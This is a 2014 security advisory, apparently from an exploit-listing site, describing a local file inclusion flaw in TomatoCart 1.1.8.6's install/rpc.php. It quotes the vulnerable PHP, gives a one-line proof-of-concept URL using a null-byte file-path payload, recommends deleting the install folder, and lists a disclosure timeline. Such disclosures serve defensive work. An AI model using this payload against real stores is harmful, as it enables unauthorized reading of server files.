TomatoCart 1.1.8.6 Local File Inclusion

2014.02.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

[+] Author: TUNISIAN CYBER [+] Exploit Title: TomatoCart 1.1.8.6 Local File Inclusion Vulnerability [+] Date: 14-02-2014 [+] Category: WebApp [+] Tested on: KaliLinux [+] Vendor: http://www.tomatocart.com/ [+] Friendly Sites: na3il.com,th3-creative.com 1.OVERVIEW: TomatoCart 1.1.8.6 (old versions too) suffers from a LFI Vulnerability. More Info about LFI: https://www.netsparker.com/local-file-inclusion/ 2.Background: TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. http://www.tomatocart.com/about-us/about-tomatocart.html 3.Vulnerability: File : /install/rpc.php Lines:21--->44 [PHP] if (isset($_GET['action']) && !empty($_GET['action'])) { switch ($_GET['action']) { case 'dbCheck': $db = array('DB_SERVER' => trim(urldecode($_GET['server'])), 'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])), 'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])), 'DB_DATABASE' => trim(urldecode($_GET['name'])), 'DB_DATABASE_CLASS' => trim(urldecode($_GET['class'])) ); $osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']); if ($osC_Database->isError() === false) { $osC_Database->selectDatabase($db['DB_DATABASE']); } if ($osC_Database->isError()) { echo '[[0|' . $osC_Database->getError() . ']]'; } else { echo '[[1]]'; } exit; break; [PHP] 4.Proof Of Concept: 127.0.0.1/install/rpc.php?action=dbCheck&class=LFI%00 5.Solution(s): No Patch was released. Delete "/install/" Folder. Use another ShoppingApplication. 6.TIME-LINE: 2014-02-13: Vulnerability was discovered. 2014-02-13: Contact with vendor. 2014-02-14: No Reply 2014-02-14: Vulnerability Released 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top